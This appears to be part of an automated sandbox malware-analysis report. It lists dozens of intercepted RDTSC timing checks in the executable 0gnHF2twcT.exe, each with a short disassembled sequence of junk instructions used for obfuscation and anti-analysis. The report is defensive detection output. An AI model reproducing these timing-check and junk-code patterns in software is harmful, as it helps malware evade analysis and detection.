                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 294891 second address: 294895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2956B8 second address: 2956CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119941h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2956CD second address: 2956E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F05491602D8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29671A second address: 296799 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F0549119947h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+12468036h], edx 0x00000017 push 00000000h 0x00000019 jne 00007F0549119942h 0x0000001f jno 00007F0549119936h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F0549119938h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov ebx, 7640CD10h 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F054911993Ah 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 296799 second address: 29679E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29679E second address: 2967CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0549119944h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F054911993Fh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2967CE second address: 2967D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2967D4 second address: 2967D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 297868 second address: 29786C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29786C second address: 297876 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 296A65 second address: 296A6F instructions: 0x00000000 rdtsc 0x00000002 js 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 296A6F second address: 296A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 296A75 second address: 296A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 298863 second address: 298868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2979E6 second address: 2979EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2979EB second address: 2979F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 297AC4 second address: 297AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 297AC8 second address: 297ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 298A20 second address: 298A2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A093C second address: 2A0942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A0942 second address: 2A0947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A0058 second address: 2A007F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F0549119938h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A007F second address: 2A0086 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A0086 second address: 2A00A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0549119944h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A00A4 second address: 2A00F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DBh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F0549160306h 0x00000014 jmp 00007F05491602E7h 0x00000019 jmp 00007F05491602E9h 0x0000001e push esi 0x0000001f ja 00007F05491602D6h 0x00000025 pushad 0x00000026 popad 0x00000027 pop esi 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A028F second address: 2A029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F0549119936h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A029E second address: 2A02A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A03DB second address: 2A03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A50FE second address: 2A512B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F05491602E5h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push edi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A512B second address: 2A512F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A51FB second address: 2A5200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A5200 second address: 2A522C instructions: 0x00000000 rdtsc 0x00000002 je 00007F054911994Eh 0x00000008 jmp 00007F0549119948h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F0549119936h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A522C second address: 2A5237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A5237 second address: 2A5279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnp 00007F054911993Ch 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F054911993Ah 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e push edx 0x0000001f jmp 00007F0549119943h 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2A5279 second address: 2A527D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AA58A second address: 2AA58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AA58F second address: 2AA5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DFh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AAB41 second address: 2AAB46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AAB46 second address: 2AAB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AAB4C second address: 2AAB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F0549119936h 0x0000000d jns 00007F0549119936h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AAF69 second address: 2AAF8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05491602E6h 0x00000008 jbe 00007F05491602D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB224 second address: 2AB229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB229 second address: 2AB243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F05491602D6h 0x00000009 jg 00007F05491602D6h 0x0000000f jne 00007F05491602D6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB243 second address: 2AB27D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F054911993Bh 0x00000012 pushad 0x00000013 jmp 00007F0549119947h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB27D second address: 2AB282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB282 second address: 2AB28A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB3F3 second address: 2AB3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB3F7 second address: 2AB415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F054911993Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F0549119936h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB415 second address: 2AB422 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB422 second address: 2AB428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB55B second address: 2AB55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB55F second address: 2AB588 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F0549119936h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F0549119936h 0x00000013 jmp 00007F0549119944h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2AB588 second address: 2AB5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F05491602E0h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 234DDA second address: 234DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F054911993Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 234DEF second address: 234E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05491602E9h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 234E10 second address: 234E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 234E17 second address: 234E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F05491602D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2B3713 second address: 2B3717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2B3853 second address: 2B3857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2B3857 second address: 2B3878 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jns 00007F0549119938h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F054911993Bh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2B3878 second address: 2B387C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2B387C second address: 2B3890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0549119936h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F054911993Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2B3D67 second address: 2B3D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F05491602DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2B3466 second address: 2B346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2B346F second address: 2B3473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BCC6A second address: 2BCC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119947h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BB6E0 second address: 2BB6E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BB6E6 second address: 2BB6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BBB89 second address: 2BBBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F05491602DEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BBBA0 second address: 2BBBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BBBA4 second address: 2BBBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05491602E4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BBFAF second address: 2BBFBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0549119936h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BBFBB second address: 2BBFC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2BB40F second address: 2BB42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119947h 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C1495 second address: 2C14A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F05491602D6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C14A4 second address: 2C14B0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0549119936h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C14B0 second address: 2C14C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C14C2 second address: 2C14C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C14C6 second address: 2C14CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27AFD3 second address: 27AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27AFDC second address: 27AFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27B3D2 second address: 27B3DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0549119936h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27B3DC second address: 27B3FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F05491602D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27B4AA second address: 27B4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27B4AF second address: 27B539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 751990B3h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F05491602D8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dl, AAh 0x0000002c call 00007F05491602D9h 0x00000031 jmp 00007F05491602DAh 0x00000036 push eax 0x00000037 jg 00007F05491602E0h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 jmp 00007F05491602DEh 0x00000046 mov eax, dword ptr [eax] 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b jnp 00007F05491602D6h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27B91D second address: 27B924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27BDD4 second address: 27BDE6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F05491602D6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27BF14 second address: 27BF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 jnl 00007F0549119938h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F054911993Bh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f js 00007F0549119936h 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27BF42 second address: 27BF5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F05491602D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F05491602D8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C0765 second address: 2C0788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F054911993Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0549119941h 0x00000011 rdtsc
